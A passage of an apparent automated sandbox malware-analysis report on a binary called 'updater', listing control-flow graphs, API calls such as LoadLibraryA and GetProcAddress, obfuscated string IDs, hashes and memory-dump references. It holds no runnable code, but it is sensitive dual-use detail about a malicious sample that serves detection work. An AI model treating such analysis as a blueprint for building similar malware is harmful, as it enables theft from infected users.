140dfe8 call 140db47 2163->2177 2173 13bbbdd-13bbbe8 2167->2173 2196 13bbc29-13bbc3c call 140db91 2168->2196 2197 13bbc61-13bbc68 2168->2197 2171->2172 2187 13bc34e-13bc377 call 140dfe8 call 140db47 2171->2187 2175 13bc381 2172->2175 2176 13bc390-13bc400 call 13cdfe8 call 13ce917 call 13ce981 call 13ce917 2172->2176 2173->2168 2173->2173 2180 13bc383-13bc38e 2175->2180 2214 13bc402 2176->2214 2215 13bc404-13bc44d call 13b83df call 13cdf41 * 5 2176->2215 2177->2162 2180->2176 2180->2180 2187->2172 2196->2197 2210 13bbc3e-13bbc60 call 140dfe8 call 140db47 2196->2210 2203 13bbc6a 2197->2203 2204 13bbc79-13bbcc6 call 13cd960 call 13cd8d6 2197->2204 2205 13bbc6c-13bbc77 2203->2205 2220 13bbd08-13bbd0f 2204->2220 2221 13bbcc8-13bbcda call 140db91 2204->2221 2205->2204 2205->2205 2210->2197 2214->2215 2215->2055 2223 13bbd11 2220->2223 2224 13bbd20-13bbda3 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2220->2224 2234 13bbcdc-13bbd04 call 140dfe8 call 140db47 2221->2234 2235 13bbd05 2221->2235 2228 13bbd13-13bbd1e 2223->2228 2256 13bbde2-13bbde9 2224->2256 2257 13bbda5-13bbdb7 call 140db91 2224->2257 2228->2224 2228->2228 2234->2235 2235->2220 2259 13bbdeb 2256->2259 2260 13bbdfa-13bbe37 call 13cd960 call 13cdfa2 call 13cda01 2256->2260 2257->2256 2264 13bbdb9-13bbde1 call 140dfe8 call 140db47 2257->2264 2262 13bbded-13bbdf8 2259->2262 2274 13bbe39-13bbe4c call 140db91 2260->2274 2275 13bbe71-13bbe78 2260->2275 2262->2260 2262->2262 2264->2256 2274->2275 2282 13bbe4e-13bbe70 call 140dfe8 call 140db47 2274->2282 2277 13bbe7a 2275->2277 2278 13bbe89-13bbed6 call 13cd960 call 13cd8d6 2275->2278 2280 13bbe7c-13bbe87 2277->2280 2288 13bbf18-13bbf1f 2278->2288 2289 13bbed8-13bbeea call 140db91 2278->2289 2280->2278 2280->2280 2282->2275 2293 13bbf21 2288->2293 2294 13bbf30-13bbfb6 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2288->2294 2298 13bbeec-13bbf14 call 140dfe8 call 140db47 2289->2298 2299 13bbf15 2289->2299 2296 13bbf23-13bbf2e 2293->2296 2315 13bbfb8-13bbfcb call 140db91 2294->2315 2316 13bbfed-13bbff4 2294->2316 2296->2294 2296->2296 2298->2299 2299->2288 2315->2316 2324 13bbfcd-13bbfec call 13cd589 call 140dfe8 call 140db47 2315->2324 2317 13bbff6 2316->2317 2318 13bc005-13bc042 call 13cd960 call 13cdfa2 call 13cda01 2316->2318 2320 13bbff8-13bc003 2317->2320 2334 13bc07c-13bc083 2318->2334 2335 13bc044-13bc057 call 140db91 2318->2335 2320->2318 2320->2320 2324->2316 2337 13bc085 2334->2337 2338 13bc094-13bc0f2 call 13cd960 call 13cd8d6 call 13b8fd9 2334->2338 2335->2334 2343 13bc059-13bc07b call 140dfe8 call 140db47 2335->2343 2341 13bc087-13bc092 2337->2341 2353 13bc134-13bc13b 2338->2353 2354 13bc0f4-13bc106 call 140db91 2338->2354 2341->2338 2341->2341 2343->2334 2356 13bc13d 2353->2356 2357 13bc14c-13bc1b8 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 4 2353->2357 2361 13bc108-13bc130 call 140dfe8 call 140db47 2354->2361 2362 13bc131 2354->2362 2359 13bc13f-13bc14a 2356->2359 2357->2040 2357->2041 2359->2357 2359->2359 2361->2362 2362->2353
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                    • String ID: &$.$.$.$.$.$.$.$.$.$.$.$CB$LO]K$O@OI$fA]Z$hGBKtGBBOr${]K\$~A\Z$~O]]
                                    • API String ID: 1208101283-3398088302
                                    • Opcode ID: f2b1d937b83569bc347602145afde050436cdf81aced45ec52ec5ab78e0977c2
                                    • Instruction ID: 6eed3d1b2ffbbce10888ca80964f463e613cb3311b5234c4ea9a54d1f4ce33a8
                                    • Opcode Fuzzy Hash: f2b1d937b83569bc347602145afde050436cdf81aced45ec52ec5ab78e0977c2
                                    • Instruction Fuzzy Hash: 53820B70D04286DFDB25EBA8C884BEDFBB0AF21714F2441AED5456B1A2DB705E48CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2380 13c1bd6-13c1c1a call 1430cfc 2383 13c1c1c-13c1c2f call 140db91 2380->2383 2384 13c1c51-13c1c57 2380->2384 2383->2384 2392 13c1c31-13c1c50 call 13cd1a9 call 140dfe8 call 140db47 2383->2392 2385 13c1c68-13c1ccd call 13ce8c7 call 13cfec9 call 13b3174 2384->2385 2386 13c1c59 2384->2386 2400 13c1cd2-13c1ce2 call 13cdd77 2385->2400 2388 13c1c5b-13c1c66 2386->2388 2388->2385 2388->2388 2392->2384 2405 13c1ce8-13c1d17 call 13ce0ab call 13b8e25 2400->2405 2406 13c2446 2400->2406 2417 13c1d19-13c1d20 call 13ce143 2405->2417 2418 13c1d25-13c1d42 call 13cdf41 call 13cea7d 2405->2418 2408 13c2448-13c245e call 13cea7d 2406->2408 2413 13c26cf-13c26fe call 13cdf41 * 3 2408->2413 2414 13c2464-13c259f call 13b8f5d * 2 call 13ce8c7 call 13cfa3b call 13ce917 call 13cfa3b call 13cdf41 * 5 call 13ce0ab * 2 call 13b8dc6 2408->2414 2518 13c25da-13c25e1 2414->2518 2519 13c25a1-13c25b3 call 140db91 2414->2519 2417->2418 2418->2408 2435 13c1d48-13c1d74 2418->2435 2437 13c1d76-13c1d88 call 140db91 2435->2437 2438 13c1db1-13c1db8 2435->2438 2437->2438 2449 13c1d8a-13c1db0 call 140dfe8 call 140db47 2437->2449 2439 13c1dc9-13c1ddd call 13cd960 2438->2439 2440 13c1dba 2438->2440 2439->2408 2450 13c1de3-13c1e06 2439->2450 2443 13c1dbc-13c1dc7 2440->2443 2443->2439 2443->2443 2449->2438 2453 13c1e08-13c1e1a call 140db91 2450->2453 2454 13c1e43-13c1e4a 2450->2454 2453->2454 2469 13c1e1c-13c1e42 call 140dfe8 call 140db47 2453->2469 2458 13c1e4c 2454->2458 2459 13c1e5b-13c1eb1 call 13cd960 call 13cdfa2 call 13cda01 2454->2459 2463 13c1e4e-13c1e59 2458->2463 2483 13c1eef-13c1ef6 2459->2483 2484 13c1eb3-13c1ec5 call 140db91 2459->2484 2463->2459 2463->2463 2469->2454 2485 13c1ef8 2483->2485 2486 13c1f07-13c1f58 call 13cd960 call 13cd8d6 2483->2486 2484->2483 2495 13c1ec7-13c1eee call 140dfe8 call 140db47 2484->2495 2489 13c1efa-13c1f05 2485->2489 2503 13c1f98-13c1f9f 2486->2503 2504 13c1f5a-13c1f6c call 140db91 2486->2504 2489->2486 2489->2489 2495->2483 2507 13c1fb0-13c202a call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2503->2507 2508 13c1fa1 2503->2508 2516 13c1f6e-13c1f94 call 140dfe8 call 140db47 2504->2516 2517 13c1f95 2504->2517 2565 13c202c-13c203e call 140db91 2507->2565 2566 13c2066-13c206d 2507->2566 2511 13c1fa3-13c1fae 2508->2511 2511->2507 2511->2511 2516->2517 2517->2503 2520 13c25f2-13c260b 2518->2520 2521 13c25e3 2518->2521 2519->2518 2532 13c25b5-13c25d9 call 13cd54d call 140dfe8 call 140db47 2519->2532 2529 13c260d-13c2620 call 140db91 2520->2529 2530 13c2645-13c264c 2520->2530 2527 13c25e5-13c25f0 2521->2527 2527->2520 2527->2527 2529->2530 2545 13c2622-13c2644 call 140dfe8 call 140db47 2529->2545 2533 13c264e-13c2659 2530->2533 2534 13c265b-13c2690 call 13ce9ec call 13ce917 2530->2534 2532->2518 2533->2533 2533->2534 2557 13c2694-13c26ca call 13b83df call 13cdf41 * 3 2534->2557 2558 13c2692 2534->2558 2545->2530 2557->2413 2558->2557 2565->2566 2578 13c2040-13c2065 call 140dfe8 call 140db47 2565->2578 2570 13c207e-13c20c4 call 13cd960 call 13cdfa2 call 13cda01 2566->2570 2571 13c206f 2566->2571 2588 13c20c6-13c20d8 call 140db91 2570->2588 2589 13c2102-13c2109 2570->2589 2575 13c2071-13c207c 2571->2575 2575->2570 2575->2575 2578->2566 2588->2589 2597 13c20da-13c2101 call 140dfe8 call 140db47 2588->2597 2591 13c211a-13c2164 call 13cd960 call 13cd8d6 2589->2591 2592 13c210b 2589->2592 2602 13c2166-13c2178 call 140db91 2591->2602 2603 13c21a3-13c21aa 2591->2603 2593 13c210d-13c2118 2592->2593 2593->2591 2593->2593 2597->2589 2613 13c217a-13c219f call 140dfe8 call 140db47 2602->2613 2614 13c21a0 2602->2614 2605 13c21ac 2603->2605 2606 13c21bb-13c223c call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2603->2606 2609 13c21ae-13c21b9 2605->2609 2629 13c223e-13c2250 call 140db91 2606->2629 2630 13c2279-13c2280 2606->2630 2609->2606 2609->2609 2613->2614 2614->2603 2629->2630 2637 13c2252-13c2278 call 140dfe8 call 140db47 2629->2637 2632 13c2291-13c22de call 13cd960 call 13cdfa2 call 13cda01 2630->2632 2633 13c2282 2630->2633 2647 13c2319-13c2320 2632->2647 2648 13c22e0-13c22f2 call 140db91 2632->2648 2635 13c2284-13c228f 2633->2635 2635->2632 2635->2635 2637->2630 2650 13c2331-13c237b call 13cd960 call 13cd8d6 2647->2650 2651 13c2322 2647->2651 2648->2647 2655 13c22f4-13c2318 call 140dfe8 call 140db47 2648->2655 2661 13c237d-13c238f call 140db91 2650->2661 2662 13c23b7-13c23be 2650->2662 2653 13c2324-13c232f 2651->2653 2653->2650 2653->2653 2655->2647 2671 13c23b4 2661->2671 2672 13c2391-13c23b3 call 140dfe8 call 140db47 2661->2672 2666 13c23cf-13c2441 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2662->2666 2667 13c23c0 2662->2667 2666->2435 2669 13c23c2-13c23cd 2667->2669 2669->2666 2669->2669 2671->2662 2672->2671
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                    • String ID: .$.$.$.$.$.$.$.$AMAB$AZAM$B.$ZAMA$ZAMA$]YA\$]]YA$`OCK$dOLLK\r.$~O]]$~\AZ
                                    • API String ID: 2013694253-1663802069
                                    • Opcode ID: dd301688c129b2f13036f4dbf0a4c1624ddca9aad7f76dc6ff9a8fcfea1a89b3
                                    • Instruction ID: a1a33f88044547731511bac210ca5f4f4d0eb9f58429ecaa7f3acc4d78c3a12a
                                    • Opcode Fuzzy Hash: dd301688c129b2f13036f4dbf0a4c1624ddca9aad7f76dc6ff9a8fcfea1a89b3
                                    • Instruction Fuzzy Hash: 09521831D04286CFDB25EFA8C844BEDBB71BF25718F14409EE4496B2A2DB705E89CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2689 13c3095-13c30c6 call 1430cfc call 13cea7d 2694 13c32ec 2689->2694 2695 13c30cc-13c311a call 13c3dfb call 13cd2ae call 13cda74 2689->2695 2697 13c32f3-13c331f 2694->2697 2716 13c311c-13c312e call 140db91 2695->2716 2717 13c3155-13c315c 2695->2717 2698 13c3356-13c335d 2697->2698 2699 13c3321-13c3334 call 140db91 2697->2699 2702 13c336e-13c33b9 call 13ce8c7 call 13cfec9 call 13b3174 call 13cdd77 2698->2702 2703 13c335f 2698->2703 2699->2698 2710 13c3336-13c3355 call 13cd0b8 call 140dfe8 call 140db47 2699->2710 2738 13c33bf-13c33dc call 13ce0ab call 13c2c33 2702->2738 2739 13c3dea 2702->2739 2707 13c3361-13c336c 2703->2707 2707->2702 2707->2707 2710->2698 2716->2717 2731 13c3130-13c3154 call 13cd132 call 140dfe8 call 140db47 2716->2731 2722 13c316d-13c31a2 call 13cda74 call 13cbb72 call 13cea7d 2717->2722 2723 13c315e 2717->2723 2747 13c31a8-13c31f1 call 13cdfe8 2722->2747 2748 13c32da 2722->2748 2728 13c3160-13c316b 2723->2728 2728->2722 2728->2728 2731->2717 2738->2739 2756 13c33e2-13c348d call 13cfec9 call 13b2e70 call 13cdd77 call 13ba25a * 2 2738->2756 2758 13c3228-13c322f 2747->2758 2759 13c31f3-13c3206 call 140db91 2747->2759 2753 13c32df-13c32ea call 13cdf41 2748->2753 2753->2697 2794 13c348f call 13b16cb 2756->2794 2795 13c3494 2756->2795 2762 13c3240-13c3289 call 13ce9ec call 13ce917 call 13cbb72 2758->2762 2763 13c3231 2758->2763 2759->2758 2771 13c3208-13c3227 call 13cd0f5 call 140dfe8 call 140db47 2759->2771 2787 13c3299-13c32c1 call 13cdf41 * 2 call 13cea7d 2762->2787 2788 13c328b-13c3294 call 13ce143 2762->2788 2766 13c3233-13c323e 2763->2766 2766->2762 2766->2766 2771->2758 2787->2753 2813 13c32c3-13c32d9 call 13cdf41 2787->2813 2788->2787 2794->2795 2798 13c3498-13c349a 2795->2798 2800 13c3dc5-13c3dc7 2798->2800 2801 13c34a0-13c34a9 call 13b2a7c 2798->2801 2802 13c3dc9-13c3dcb call 13b16cb 2800->2802 2803 13c3dd0-13c3dd8 2800->2803 2814 13c34af-13c34ee call 13ce5d4 call 13cdf41 2801->2814 2815 13c3da9-13c3daf call 13b2ebb 2801->2815 2802->2803 2807 13c3ddf-13c3de5 call 13cdf41 2803->2807 2808 13c3dda call 13b16cb 2803->2808 2807->2739 2808->2807 2814->2815 2825 13c34f4-13c35bf call 13ce5d4 call 13cfec9 call 13b2e70 call 13cdd77 call 13cdf41 call 13ba25a * 2 2814->2825 2821 13c3db4-13c3dc0 2815->2821 2821->2798 2840 13c35c6 2825->2840 2841 13c35c1 call 13b16cb 2825->2841 2843 13c35ca-13c35cc 2840->2843 2841->2840 2844 13c3d8b-13c3d8d 2843->2844 2845 13c35d2-13c35db call 13b2a7c 2843->2845 2846 13c3d8f-13c3d91 call 13b16cb 2844->2846 2847 13c3d96-13c3da2 2844->2847 2852 13c3d6f-13c3d75 call 13b2ebb 2845->2852 2853 13c35e1-13c3612 2845->2853 2846->2847 2847->2815 2851 13c3da4 call 13b16cb 2847->2851 2851->2815 2860 13c3d7a-13c3d86 2852->2860 2856 13c3614-13c3626 call 140db91 2853->2856 2857 13c3650-13c3657 2853->2857 2856->2857 2866 13c3628-13c364f call 140dfe8 call 140db47 2856->2866 2858 13c3668-13c36bb call 13b23eb call 13ce5d4 call 13cea7d call 13cdf41 call 13cdd77 2857->2858 2859 13c3659 2857->2859 2858->2852 2879 13c36c1-13c36f2 call 13ce5d4 call 13b8e25 2858->2879 2862 13c365b-13c3666 2859->2862 2860->2843 2862->2858 2862->2862 2866->2857 2884 13c36f4-13c36fc call 13ce143 2879->2884 2885 13c3701-13c3707 call 13cdf41 2879->2885 2884->2885 2888 13c370c-13c373c 2885->2888 2889 13c373e-13c3751 call 140db91 2888->2889 2890 13c3777-13c377e 2888->2890 2889->2890 2898 13c3753-13c3776 call 140dfe8 call 140db47 2889->2898 2891 13c378f-13c37a3 call 13cd960 2890->2891 2892 13c3780 2890->2892 2891->2852 2899 13c37a9-13c37de 2891->2899 2894 13c3782-13c378d 2892->2894 2894->2891 2894->2894 2898->2890 2902 13c3815-13c381c 2899->2902 2903 13c37e0-13c37f3 call 140db91 2899->2903 2905 13c382d-13c38ad call 13ce9ec call 13ce917 call 13cd9e5 call 13cdf41 * 2 2902->2905 2906 13c381e 2902->2906 2903->2902 2913 13c37f5-13c3814 call 13cd1e6 call 140dfe8 call 140db47 2903->2913 2928 13c38af-13c38c2 call 140db91 2905->2928 2929 13c38e8-13c38ef 2905->2929 2909 13c3820-13c382b 2906->2909 2909->2905 2909->2909 2913->2902 2928->2929 2936 13c38c4-13c38e7 call 140dfe8 call 140db47 2928->2936 2931 13c3900-13c3977 call 13cd960 call 13cdfa2 call 13cda01 call 13cd960 call 13cd8d6 2929->2931 2932 13c38f1 2929->2932 2950 13c3979-13c398b call 140db91 2931->2950 2951 13c39b2-13c39b9 2931->2951 2934 13c38f3-13c38fe 2932->2934 2934->2931 2934->2934 2936->2929 2950->2951 2959 13c398d-13c39b1 call 140dfe8 call 140db47 2950->2959 2952 13c39ca-13c3a44 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 2951->2952 2953 13c39bb 2951->2953 2974 13c3a7b-13c3a82 2952->2974 2975 13c3a46-13c3a59 call 140db91 2952->2975 2955 13c39bd-13c39c8 2953->2955 2955->2952 2955->2955 2959->2951 2977 13c3a84 2974->2977 2978 13c3a93-13c3b16 call 13cd960 call 13cdfa2 call 13cda01 call 13cd960 call 13cd8d6 call 13c2f89 2974->2978 2975->2974 2982 13c3a5b-13c3a7a call 13cd1a9 call 140dfe8 call 140db47 2975->2982 2980 13c3a86-13c3a91 2977->2980 3000 13c3b18-13c3b2a call 140db91 2978->3000 3001 13c3b52-13c3b59 2978->3001 2980->2978 2980->2980 2982->2974 3000->3001 3009 13c3b2c-13c3b51 call 140dfe8 call 140db47 3000->3009 3002 13c3b6a-13c3be7 call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 3001->3002 3003 13c3b5b 3001->3003 3024 13c3c1e-13c3c25 3002->3024 3025 13c3be9-13c3bfc call 140db91 3002->3025 3005 13c3b5d-13c3b68 3003->3005 3005->3002 3005->3005 3009->3001 3027 13c3c36-13c3cb7 call 13cd960 call 13cdfa2 call 13cda01 call 13cd960 call 13cd8d6 call 13c2f89 3024->3027 3028 13c3c27 3024->3028 3025->3024 3033 13c3bfe-13c3c1d call 13cd1a9 call 140dfe8 call 140db47 3025->3033 3050 13c3cb9-13c3ccb call 140db91 3027->3050 3051 13c3cf2-13c3cf9 3027->3051 3031 13c3c29-13c3c34 3028->3031 3031->3027 3031->3031 3033->3024 3050->3051 3059 13c3ccd-13c3cf1 call 140dfe8 call 140db47 3050->3059 3052 13c3d0a-13c3d6a call 13cea3d call 13ce917 call 13cd9e5 call 13cdf41 * 3 3051->3052 3053 13c3cfb 3051->3053 3052->2888 3055 13c3cfd-13c3d08 3053->3055 3055->3052 3055->3055 3059->3051
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionDeallocateVariableWake
                                    • String ID: !$.$.$.$.$.$BAIG@]$HGBK$Install Directory$Z@OC$Z@OC$[]K\$\Main$]|$].$]A@.$hAVs
                                    • API String ID: 1208101283-1360112660
                                    • Opcode ID: 6a8e9b4653f013fb1d5fa5b10c04950db8f5303c7174ebc08453999a8b7fe91c
                                    • Instruction ID: ea00767e8cdfb32a4ea81302418bdfdb9d451ae2c9c3549771b612028883b5a0
                                    • Opcode Fuzzy Hash: 6a8e9b4653f013fb1d5fa5b10c04950db8f5303c7174ebc08453999a8b7fe91c
                                    • Instruction Fuzzy Hash: A2723930D0039A9BDB25EBA8CC44BEDBB70BF21718F14819ED5096B1A2DF705E89CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
                                    • String ID: .$.$=$B.$B.$\history$\history\$dOLLK\r.$dOLLK\r.$rOMMA[@Z]$rOMMA[@Z]$r~}g$r~}g$r~}gr.$r~}gr.
                                    • API String ID: 4060657020-2226889094
                                    • Opcode ID: 9f041025e0721eb05a341e7e7ce45bdb52d5359bc942095a54ccb62ea182922a
                                    • Instruction ID: 935f8ed859213013fe60aa7966a50530bca5f02189ac8976d3a29075d1c926f9
                                    • Opcode Fuzzy Hash: 9f041025e0721eb05a341e7e7ce45bdb52d5359bc942095a54ccb62ea182922a
                                    • Instruction Fuzzy Hash: A4D29130D0429ADEDB25EBA8C994BEDBB70AF25708F1040DED5496B292DB705F88CF51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3659 13ca518-13ca528 3660 13ca52e-13ca55f 3659->3660 3661 13ca8b0 3659->3661 3662 13ca59b-13ca5a1 3660->3662 3663 13ca561-13ca573 call 140db91 3660->3663 3664 13ca8b2-13ca8b6 3661->3664 3666 13ca5b2-13ca5c7 LoadLibraryA 3662->3666 3667 13ca5a3 3662->3667 3663->3662 3673 13ca575-13ca59a call 140dfe8 call 140db47 3663->3673 3666->3661 3668 13ca5cd-13ca5ea 3666->3668 3670 13ca5a5-13ca5b0 3667->3670 3671 13ca5ec-13ca5ff call 140db91 3668->3671 3672 13ca622-13ca628 3668->3672 3670->3666 3670->3670 3684 13ca61c 3671->3684 3685 13ca601-13ca61b call 13ccfde call 140dfe8 call 140db47 3671->3685 3676 13ca639-13ca66d GetProcAddress 3672->3676 3677 13ca62a 3672->3677 3673->3662 3678 13ca66f-13ca681 call 140db91 3676->3678 3679 13ca6a8-13ca6ae 3676->3679 3682 13ca62c-13ca637 3677->3682 3678->3679 3696 13ca683-13ca6a7 call 13cd54d call 140dfe8 call 140db47 3678->3696 3687 13ca6bf-13ca6f0 GetProcAddress 3679->3687 3688 13ca6b0 3679->3688 3682->3676 3682->3682 3684->3672 3685->3684 3693 13ca732-13ca738 3687->3693 3694 13ca6f2-13ca704 call 140db91 3687->3694 3692 13ca6b2-13ca6bd 3688->3692 3692->3687 3692->3692 3698 13ca749-13ca78b GetProcAddress call 13ca8b7 call 13cd2ae GetProcAddress 3693->3698 3699 13ca73a 3693->3699 3694->3693 3705 13ca706-13ca731 call 140dfe8 call 140db47 3694->3705 3696->3679 3719 13ca78d-13ca79f call 140db91 3698->3719 3720 13ca7c6-13ca802 call 13cd30d GetProcAddress 3698->3720 3703 13ca73c-13ca747 3699->3703 3703->3698 3703->3703 3705->3693 3719->3720 3727 13ca7a1-13ca7c5 call 13cd327 call 140dfe8 call 140db47 3719->3727 3728 13ca804-13ca816 call 140db91 3720->3728 3729 13ca841-13ca847 3720->3729 3727->3720 3728->3729 3740 13ca818-13ca840 call 140dfe8 call 140db47 3728->3740 3731 13ca849-13ca854 3729->3731 3732 13ca856-13ca86f GetProcAddress 3729->3732 3731->3731 3731->3732 3735 13ca8a4-13ca8aa FreeLibrary 3732->3735 3736 13ca871-13ca878 3732->3736 3735->3661 3736->3735 3739 13ca87a-13ca881 3736->3739 3739->3735 3743 13ca883-13ca88a 3739->3743 3740->3729 3743->3735 3746 13ca88c-13ca893 3743->3746 3746->3735 3749 13ca895-13ca897 3746->3749 3749->3735 3751 13ca899-13ca8a2 3749->3751 3751->3664
                                    APIs
                                    • LoadLibraryA.KERNEL32(01455C78), ref: 013CA5B7
                                    • GetProcAddress.KERNEL32(00000000,0145606C), ref: 013CA645
                                    • GetProcAddress.KERNEL32(01455180), ref: 013CA754
                                    • GetProcAddress.KERNEL32(00000000), ref: 013CA76E
                                    • GetProcAddress.KERNEL32(00000000), ref: 013CA7D7
                                    • GetProcAddress.KERNEL32(01454F88), ref: 013CA6CA
                                      • Part of subcall function 0140DB91: EnterCriticalSection.KERNEL32(01453CAC,?,7369FFF6,?,013B416B,014554D0,00000000), ref: 0140DB9C
                                      • Part of subcall function 0140DB91: LeaveCriticalSection.KERNEL32(01453CAC,?,013B416B,014554D0,00000000), ref: 0140DBD9
                                    • GetProcAddress.KERNEL32(01456088), ref: 013CA861
                                      • Part of subcall function 0140DB47: EnterCriticalSection.KERNEL32(01453CAC,69494B7C,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB51
                                      • Part of subcall function 0140DB47: LeaveCriticalSection.KERNEL32(01453CAC,?,013B4193,014554D0,0143549D,?,7369FFF6,00000000), ref: 0140DB84
                                      • Part of subcall function 0140DB47: RtlWakeAllConditionVariable.NTDLL ref: 0140DBFB
                                    • FreeLibrary.KERNEL32 ref: 013CA8AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$CriticalSection$EnterLeaveLibrary$ConditionFreeLoadVariableWake
                                    • String ID: .$XO[BZMBG$gZKC
                                    • API String ID: 2402374661-770554371
                                    • Opcode ID: 062888d3675fe64bf27916bd57ba3d136f43f850da38b48c930e8f2fa0b88114
                                    • Instruction ID: 94faac4f4a8481c380126ec17ce5e8e5b2469e7d45cfb33ec283e9c84d9f20f8
                                    • Opcode Fuzzy Hash: 062888d3675fe64bf27916bd57ba3d136f43f850da38b48c930e8f2fa0b88114
                                    • Instruction Fuzzy Hash: 63912474900386ABDB22EFA9E44466DBFF0AB51718F1A011ED550AF2B6EB7098C5CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4156 13f61b5-13f621d 4157 13f621f-13f6221 4156->4157 4158 13f622b-13f6230 4156->4158 4157->4158 4159 13f6223-13f6226 4157->4159 4160 13f624c-13f624e 4158->4160 4161 13f6232-13f6235 4158->4161 4164 13f64d8-13f64f5 call 140e288 4159->4164 4162 13f64d6 4160->4162 4163 13f6254-13f625d 4160->4163 4161->4160 4165 13f6237-13f623d 4161->4165 4162->4164 4166 13f62cf-13f62f8 call 13f64fd 4163->4166 4167 13f625f-13f6262 4163->4167 4169 13f623f-13f6241 4165->4169 4170 13f6243-13f6249 4165->4170 4181 13f62fe-13f631f call 13f5c8d 4166->4181 4182 13f64cc-13f64cd call 13f5d9c 4166->4182 4171 13f6264-13f626a 4167->4171 4172 13f6270-13f627f GetLongPathNameW 4167->4172 4169->4160 4169->4170 4170->4160 4171->4172 4175 13f626c-13f626e 4171->4175 4176 13f628c-13f6297 4172->4176 4177 13f6281-13f6287 GetLastError 4172->4177 4175->4166 4175->4172 4179 13f6299-13f629e 4176->4179 4180 13f62a0-13f62c3 4176->4180 4177->4164 4179->4166 4179->4180 4180->4162 4184 13f62c9 4180->4184 4188 13f6325-13f632b 4181->4188 4189 13f6422-13f642f GetFileInformationByHandle 4181->4189 4187 13f64d2-13f64d4 4182->4187 4184->4166 4187->4164 4190 13f632d-13f632f 4188->4190 4191 13f6386-13f6388 4188->4191 4192 13f6435-13f6470 4189->4192 4193 